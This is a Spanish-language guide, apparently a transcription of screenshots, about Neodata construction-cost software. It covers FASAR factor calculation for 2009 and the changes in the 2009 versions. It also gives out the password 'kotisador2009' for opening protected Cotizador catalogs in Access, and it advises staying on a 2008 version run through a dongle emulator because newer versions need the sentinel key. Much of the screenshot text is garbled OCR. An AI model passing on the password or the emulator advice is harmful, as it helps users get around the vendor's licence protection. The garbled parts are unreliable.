NUESTROS CATALOGOS A LA CARPETA MAESTROS 


(CArchivos de programaWNeodata 2008 Maestros) 


Link descarga cotizador Ultima revisión : http://www.neodata.com.mx/Archivos/Cotizador2009.exe (16 MB Aprox) 


LA CONTRASEÑA kotisador2009 FUNCIONA CON LOS SIGUIENTES CATALOGOS 


COTIZADOR JUNIO 2009.pu6 
COTIZADOR REGIONES JUN 09.pu6 
VIVIENDA Y URBANIZACION.pu6 


ABRIR MICROSOFT ACCESS 2007 
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Mi música 
Mis imágenes 


COTIZADOR REGIONES JUN 09 


Canalizacic 
venta: 


[roses 
(E 1) Cemeaa ) 
Abrir 


Abrir como de sólo lectura 


Abrir en modo exclusivo de sólo lectura 
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Herramientas de tabla Microsoft Access A 


Inicio Crear  Datosexte Nuterramientas de base de datos Y Hoja de datos | 
E Sl A mm) 4 Administrador del panel de control mi 
E JA P z 


y E] Dependencias del objeto ES ñ 
Visual -.. || Relaciones — de datos | Codificar o descodificar Adminis . Crear | Usuariosy Opciones 
Basic 7) | [_] Barra de mensajes 6 | 5 gr ss base de datos tro cuifas ¿7 Complementos + MDE || permisos * de réplica > | 
| Macro Mostrar u: ocultar O | Herramientas de base de datos | Administrar 
Tablas Anular la contraseña estableci la base ds datos 


AdtividadCriterios 
Adjuntos ES CostoHorario 
Calendario codva y] codcomb +| codAcei +|codOtrasFut»| codPza |  foper + | potencia ve ”| ha 4 
Catalogo VA3.5 113.5 GASOLINA ACEITE 
= |¡CFASPIRAR — VAASPIRAR 
Clasificadores — 
— |CFBAILAR VABAILAR GASOLINA ACEITE 

a - |CFBOMBA  VABOMBA GASOLINA ACEITE 
GostoskREQIóN _ [|CFCAMION  VACAMION LLCAMION DIESEL ACEITE 
Criterios _ CFCO oNpP prove DIESEL ACEITE 100 77 10000 
EstFolios _¡CFCO co e 80 0 6000 l 
uu _¡CFcO RTAP GASOLINA ACEITE 80 13 2000 

: | CFDSMXL VADSMXL DIESEL ACEITE 75 110 10000 
Ec |CFDGR VADOR DIESEL ACEITE 
ao =I'  ¡cro7R VAD7R DIESEL ACEITE 
EstProgramaDet | CFD8R VAD8R DIESEL ACEITE 
ExplnsPar | CFD9R VAD9IR DIESEL ACEITE 

|[CFDOBLA VADOBLA 
ExpXconcepto | 
| CFECORTE VAECORTE 

2... | CFENGAR VAENGAR GASOLINA ACEITE 
Familias | CFEX3078 VAEX307B DIESEL ACEITE 80 54 10000 


"TIT | sta CONTRASEÑA: kótisador2009 2 3 2 
a —cPUNGIONA CONOS SIGUIENTES CATALOGOS E E 
ls SC OTIZADOR JUNIO 2005.pu6 E 
uc —'"COTIZADOR REGIONES“JUN 09.pu6 o o 


MtoDisponibilidad 


cv VENDA Y URBANIZACION.pu6 — : —=Ñ 


MtoEquipo _|CFMOTO 75 140 10000 
Parametros [CFMOTO14H VAMOTO14H LLAMOTO14H DIESEL ACEITE 75 215 10000 
Partidas [CFMOTO16H  VAMOTO16H LLAMOTO16H DIESEL ACEITE 75 275 10000 
ME | CFPAVI VAPAVI LLPAVI DIESEL ACEITE 85 180 10000 
|CFPETRO VAPETRO LLPETRO GASOLINA ACEITE 95 120 10000 
pa [CFPIPA VAPIPA LLPIPA GASOLINA ACEITE 85 90 10000 
Presupuesto |CFPLAN VAPLAN 
ProCausa l AS A A A NA 


000000000000000000000000000000000l 


Buscar 


Registro; 14 + 1de54 |» bo | TK Sin filtro 


Inicio >> Desfragmentador CO Reproductor de 4 (” VltraEdit - [C:1M Mí dis documentos Mr Maestros . in título - Bloc de Pp Microsoft Access 
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¿Cómo calcular el FASAR 2009 en Neodata 2008? 


En cuanto al Fasar 2009 No hay de que preocuparse, el Seguro Social, fue ajustando sus porcentajes de la cuota Fija, y del Excedente de tres veces el salario mínimo del DF, a partir de 1997 y hasta el 2008, por 
lo que los factores utilizados en el 2008 serán los que se utilicen de aquí en adelante. 


Precios2009 


i ) Se consideran los factores del año 2008, de acuerdo a La ley del Seguro Social, en su artículo 25 Transitorio, Fracc II. y de la última reforma de fecha 


11-08-2006, articulo segundo. Publicada el dia 21 de Noviembre del 2006, 


Por tanto selecciona 2008, ya que esos son los factores para 2008, 2009 etc. así que lo factores aplicables a partir del 2008, siguen vigentes hasta que la ley del Seguro Social, indique lo contrario. 
NEODATA PRECIOS UNITARIOS 2008: 

Si tienes instalada la versión 2008 con el emulador del SCT, te recomiendo que te quedes con esa versión por el momento, porque si instalas otra versión ya no te funcionará. 

CAMBIO EN LA ACTUALIZACIÓN NEODATA P.U 2009: 

La Versión del 19 de Enero 2009: 


Lo nuevo de esta versión es lo siguiente: Se mejoro la estructura de la Base de Datos de los Cotizadores por razones de crecimiento de la información, por tal motivo a partir de Esta fecha los Cotizadores solo 
son compatibles con la versión 2009 de Precios unitarios. En la ventana de FASAR, en el combo de selección se agrego el año 2009 y el mensaje indicando que se mantendrán los porcentajes para el cálculo de 
las prestaciones. De acuerdo al artículo: Se consideran los factores del año 2008, de acuerdo a La ley del Seguro Social, en su artículo 25 Transitorio, Fracc 11. y de la última reforma de fecha 11-08-2006, 
artículo segundo. Publicada el dia 21 de Noviembre del 2006 


Para la Versión 20 de Marzo de 2009: 


Lo nuevo de esta versión es lo siguiente: Se agrego la Exportación e Importación hacia el software de diseño REVIT. En el menu Archivo - Exportar se encuentra la opción REVIT, solo tiene que indicar la tuta y 
nombre del archivo y el sistema generara un archivo *.txt, el cual utilizara en REVIT para vincularlo con los objetos; muros, ventanas, etc. 


El Proceso de importar datos a Neodata 2009 
Importar de: 
Neodala SS Productos CAD 
(+. Neodala versión 99/ 2000 C Cuantilicación AutoCAD (DANTE) 
” Neodata versión 98 C ArchiCAD 


( 


Neodata versión 7.1 CR . 


Administradores de proyectos Mescadeo de insumos Pisma 


T Pimavera Project Planner A 
— Microsoft Project 98/2000 £ Imeortar meumos Prama 


Pumavera Enterprise 
Dios sstemas de Precios Untarios 

Campeón 6.21 ” Sacic52 ¿50 (ASCII) 
” Sarcie 2b [DOS DEF) 
 Sinco versión 3 


Campeón 7 

” Mega versión 1 

E Mega versión 2 

— Cobra 
INFOCOM Opus 2000, OLE y 4EC10 


Con estos procesos Neodata se comunica Su opción 


con olos sstemas para bundarle aun más Neodata versión 99/ 2000 
ventas en el proceso de productividad de 
su empresa 


Aceptar Cancelar 


En REVIT se genera un archivo *.txt con las cuantificaciones de los objetos, y en el menu Archivo - Importar desde PU se encuentra la opción, para importar la información, solo se elije el Archivo e importara 
las cuantificaciones realizadas en REVIT. 
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Neodata versión 2006 
C Neodata versión 2004/2003/2001 


Neodata versión 2000 
Primavera Project Planner 
Microsoft Project 98/2000 
Sure Track 


Archi Cad 


Cancelar | 


Y Para el caso de la Versión del 06 de Abril del 2009: 


Lo nuevo de esta versión es lo siguiente: Se agrego la opción de Imprimir una hoja por cada categoria en el FASAR (FASAR Formato Individual), esta opción se encuentra en la ventana de FASAR. Primero se 
genera el FASAR y posteriormente se genera el FASAR Individual. 


Así que tu sabes si te actualizas....pero te comento que ésta ultima versión funciona solo como versión de demostración si no cuentas con el sentinel. 


Por AntiNeodata, S. A. de C. V. 
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